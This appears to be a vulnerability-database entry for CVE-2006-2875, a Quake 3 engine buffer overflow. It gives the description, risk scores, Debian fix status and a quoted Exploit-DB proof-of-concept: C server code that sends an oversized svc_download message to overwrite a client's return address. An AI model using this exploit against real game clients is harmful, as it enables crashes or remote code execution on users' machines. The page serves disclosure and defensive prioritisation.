CVE-2006-2875

VIR risk: 1.0

Description

Stack-based buffer overflow in the CL_ParseDownload function of Quake 3 Engine 1.32c and earlier, as used in multiple products, allows remote attackers to execute arbitrary code via a svc_download command with compressed data that triggers the overflow during expansion.

Predictions

Exploit likelihood: 20%
Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-27969 · DoS · multiple · verified · text · 1 KB
Luigi Auriemma · 2006-06-05

Quake 3 Engine - 'CL_ParseDownload' Remote Buffer Overflow

Source: Exploit-DB (text exploit)
// source: https://www.securityfocus.com/bid/18271/info
// 
// The Quake 3 engine is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
// 
// Remote attackers may exploit this issue to execute arbitrary machine code in the context of affected game clients. Failed exploit attempts will likely crash affected clients.
// 
// Quake 3 version 1.32c and Icculus.org Quake 3 revision 795 are vulnerable to this issue; other versions may also be affected. The affected game engine has been used to create many derivative games, which may also be affected.
// 

// send the gamestate
int i;
MSG_WriteByte( &msg, svc_download );
MSG_WriteShort( &msg, -1 ); // block != 0, for fast return
MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
for(i = 0; i < 16384; i++) { // overwrite the data buffer
MSG_WriteByte(&msg, 0x00); // 0x00 for saving space
}
for(i = 0; i < 32; i++) { // do the rest of the job
MSG_WriteByte(&msg, 'a'); // return address: 0x61616161
}
SV_SendMessageToClient( &msg, client );
return;

OS impact

Debian: fixed in 5 releases

Release    Status   Fixed in
trixie     Fixed    1.36+svn1788j-1
sid        Fixed    1.36+svn1788j-1
forky      Fixed    1.36+svn1788j-1
bullseye   Fixed    1.36+svn1788j-1
bookworm   Fixed    1.36+svn1788j-1
